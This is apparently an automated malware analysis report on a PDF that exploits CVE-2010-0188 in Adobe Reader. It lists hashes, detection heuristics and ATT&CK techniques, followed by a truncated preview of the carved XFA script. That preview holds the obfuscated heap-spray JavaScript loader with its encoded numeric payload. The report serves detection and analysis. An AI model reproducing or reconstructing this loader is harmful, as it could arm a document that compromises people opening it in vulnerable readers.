Malicious PDF — malware analysis report

Static analysis result for SHA-256 605467c7f4a9c729…

Verdict: MALICIOUS
File type: PDF
Size: 13.0 KB
MD5: 372a4416e6e4d6b67976300017d57011
SHA-1: 0fefe76b1306249913434bbe474917222da39b5c
SHA-256: 605467c7f4a9c729dd9b0960eec59aa9c2186dd3d9e9fe3c5923cfca3c172949
Risk score: 352

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 JavaScript

This PDF file contains XFA (XML Forms Architecture) content that triggers a heap spray exploit targeting CVE-2010-0188 in Adobe Reader. The embedded JavaScript is obfuscated but is designed to execute malicious code, likely leading to the download and execution of a second-stage payload. The ML classifier and ClamAV detection strongly indicate malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (11)

  • Adobe Reader LibTIFF XFA image exploit — CVE-2010-0188 (severity: critical; tags: CVE likely; rule: CVE_2010_0188)
    PDF contains the CVE-2010-0188 exploit template: XFA JavaScript heap-spray setup, a generated TIFF image payload, and assignment of that TIFF data to an XFA image field rawValue to trigger Adobe Reader's LibTIFF parser.
  • XFA form contains risky executable script (severity: high; tags: CVE related; rule: PDF_XFA_SCRIPT)
    PDF embeds an XFA form whose script block contains exploit, submission/launch, or shell-execution primitives. Ordinary LiveCycle print/update scripts are left as generic XFA/JS signals unless stronger behavior is present.
  • ClamAV: Pdf.Exploit.Agent-36755 (severity: critical; rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Pdf.Exploit.Agent-36755
  • XFA JavaScript heap-spray exploit code (severity: critical; rule: PDF_XFA_HEAP_SPRAY)
    PDF contains XFA script content with heap-spray or shellcode-like JavaScript markers such as large encoded word sequences, util.pack, large arrays, or spray variable names. This is a weaponised Adobe Reader exploit pattern, not a normal interactive form.
  • JavaScript action (severity: low; 2 related findings; rule: PDF_JAVASCRIPT)
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • PDF JavaScript exploit cluster (severity: critical; rule: PDF_JS_EXPLOIT_CLUSTER)
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.
  • Embedded JS stream (severity: low; rule: PDF_JS)
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • XFA form (severity: low; rule: PDF_XFA)
    PDF uses XML Forms Architecture, which can contain script logic.
  • Embedded script payload in PDF stream (severity: low; rule: PDF_EMBEDDED_SCRIPT_PAYLOAD)
    PDF stream bytes contain an HTML/XFA <script> tag without accompanying Windows shell-execution primitives — common in accessible XFA forms but worth surfacing for analyst review.
  • AcroForm button with action trigger (severity: low; rule: PDF_ACROFORM_BUTTON)
    PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger. This is the building block of fake 'Download' or 'Open' button overlays used in PDF phishing lures.
  • Embedded URL (severity: info; rule: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URLs found in PDF document text:
    • http://ns.adobe.com/xdp/
    • http://www.xfa.org/schema/xfa-template/2.5
    • http://www.xfa.org/schema/xfa-data/1.0

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: embedded_pdf_script_000003e2.bin
SHA-256: 1fc821c7f23a774a99b550d21e8dda643e46e3fb8cc5c3d11bb886e451c7ca9c
Kind: pdf-embedded-script
Source: PDF raw stream script payload at offset 0x3E2
Size: 12238 bytes

Script preview (first 1,000 lines of the extracted script):
<xdp:xdp xmlns:xdp='http://ns.adobe.com/xdp/'>
<asd/>as<config><asd/>
<present>
<pdf
>
<int>0</int>
<interactive>&#000049;</interactive>
a
<asd/>a<version>
1.5</version>
a<asd/>
</pdf>
</present>
<asd/></config><asd/>
<template xmlns='http://www.xfa.org/schema/xfa-template/2.5'>
<asd/>
a<subform name="a1">		<pageSet>
			<pageArea id="roteYom" name="roteYom">
				<contentArea h="756pt" w="576pt" x="0.25in" y="0.25in"/>
				<medium long="792pt" short="612pt" stock="default"/>
			</pageArea>
		</pageSet>
<asd/>a
		<subform name='v236536b346b'>
		a<asd/>a<field name='qwe123b'>a<asd/>a<event asd='wqr' activity='initialize'>
a<asd></asd><script
contentType='application/x-javascript'>

m=1-1;
cc="A +wL1/U;?Cu64^yed[Y(tiVb%]=BEjqfl-IxnK:*h}0R),{8Q59WSm3Fgoca.&lt;MsvDp2k'r\"_7";
x='efv5';
q=x[0]+'val';
a=(Number+Number).substr(2,3);
aa=([].sort+[].sort).substr(2,3);
if (a===aa){
t='214124';
e=t['indexOf'];
&#000119;=e(12)[q];
s=new Array();
ss='split';
ar='65@60@71@1@67@60@17@17@22@37@57@8@65@60@71@1@24@24@24@46@1@59@59@59@46@1@17@17@17@46@1@16@16@16@46@1@32@32@32@46@1@57@57@57@46@1@41@41@41@8@65@60@71@1@67@58@22@37@21@16@71@64@73@60@46@1@22@8@65@60@71@1@36@1@27@1@37@16@3@1@0@71@71@60@15@20@45@8@65@60@71@1@15@1@27@1@37@16@3@1@0@71@71@60@15@20@45@8@65@60@71@1@73@33@5@27@72@13@59@68@43@12@43@43@32@43@50@5@74@48@43@13@60@55@59@68@43@12@43@43@32@43@32@12@55@48@43@13@60@60@55@16@24@48@43@13@60@55@43@68@43@48@68@13@60@12@16@68@32@48@43@13@60@13@5@13@5@13@5@13@5@68@12@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@43@5@68@55@51@48@43@13@60@12@13@68@43@12@43@43@32@43@43@43@13@43@43@43@43@13@5@13@5@13@5@13@5@13@5@13@5@13@5@13@5@12@12@48@55@16@13@32@59@32@59@48@50@16@13@74@50@55@13@16@51@50@32@55@55@59@43@12@13@48@24@13@43@55@43@48@24@13@43@43@59@48@24@74@43@5@59@50@12@48@24@74@12@43@48@55@55@17@24@12@12@48@24@50@16@55@59@43@55@74@13@55@55@68@59@48@5@16@16@5@50@5@43@32@32@32@32@24@48@48@24@13@43@55@43@59@55@13@12@55@51@43@12@74@50@32@24@48@74@55@13@68@13@48@50@16@13@74@50@50@5@16@51@16@24@13@59@50@5@50@12@48@24@74@50@55@59@48@24@74@13@55@50@74@48@43@55@32@50@50@12@48@24@74@12@68@43@43@55@32@50@55@55@59@51@13@51@13@5@32@59@60@17@43@55@59@50@55@55@17@24@43@32@24@16@5@43@55@48@32@68@74@13@43@48@59@5@59@24@43@17@43@55@17@60@13@43@16@24@32@5@55@24@5@32@74@50@16@12@50@16@48@24@50@16@68@13@43@55@17@17@12@12@48@24@43@59@13@24@48@17@13@12@16@59@32@32@50@13@68@13@43@59@48@24@17@48@43@55@17@17@48@24@43@13@48@24@43@55@59@50@60@24@50@16@50@51@59@55@16@24@50@55@60@17@48@24@12@48@68@43@48@43@74@17@43@59@55@55@74@13@43@55@51@12@16@24@32@55@48@24@12@48@43@48@48@24@32@74@12@60@43@50@50@51@16@48@51@48@32@32@32@32@32@32@16@68@32@51@16@48@43@43@43@43@43@43@43@43@50@48@50@43@12@60@13@43@12@48@32@32@43@43@43@43@43@43@50@43@48@55@59@43@5@51@50@43@50@50@48@24@16@59@48@24@50@16@5@43@48@55@59@55@43@50@32@32@16@55@12@48@12@32@12@16@43@43@43@43@12@48@74@50@74@68@12@59@12@17@50@13@32@32@5@12@48@55@59@13@43@48@48@2
4@16@48@16@48@12@5@32@32@32@32@32@32@16@24@43@68@16@24@74@68@48@5@16@59@43@13@43@5@43@43@43@43@48@17@50@59@68@13@43@59@59@74@43@13@68@13@74@68@12@50@12@74@74@55@59@74@13@13@68@13@43@13@74@12@74@68@55@55@55@68@59@74@13@13@68@13@43@48@68@43@68@17@74@55@68@43@50@55@12@48@32@48@43@43@43@43@43@43@32@32@50@12@43@59@48@24@16@48@55@55@59@51@50@5@59@74@13@13@5@17@43@43@74@74@74@43@12@68@74@13@59@74@13@13@5@17@43@50@68@16@12@13@12@59@12@59@59@12@13@13@5@17@43@51@43@43@50@51@48@60@59@5@43@13@55@43@48@48@13@13@5@17@43@13@13@5@50@5@12@60@43@43@12@60@43@43@50@55@50@74@12@60@43@43@32@32@50@12@5@13@48@50@59@43@74@50@5@12@12@60@43@43@50@55@32@32@50@12@43@13@12@60@43@43@48@55@16@24@43@59@50@55@32@32@50@12@43@13@48@55@59@55@43@59@16@24@43@68@16@24@5@55@13@74@48@43@55@32@43@43@74@50@32@60@13@74@48@43@55@32@43@43@74@50@59@13@12@60@43@43@12@60@32@16@32@32@50@12@43@48@16@48@51@59@32@16@32@32@32@32@48@16@13@16@43@16@16@59@51@48@32@16@48@60@43@16@48@51@12@32@43@5@24@17@55@55@59@60@48@60@50@24@5@24@59@12@13@12@74@51@55@12@5@60@68@32@74@43@12@48@74@13@74@13@74@43@55@60@68@32@68@32@55@74@55@51@68@16@55@5@55@5
... (truncated)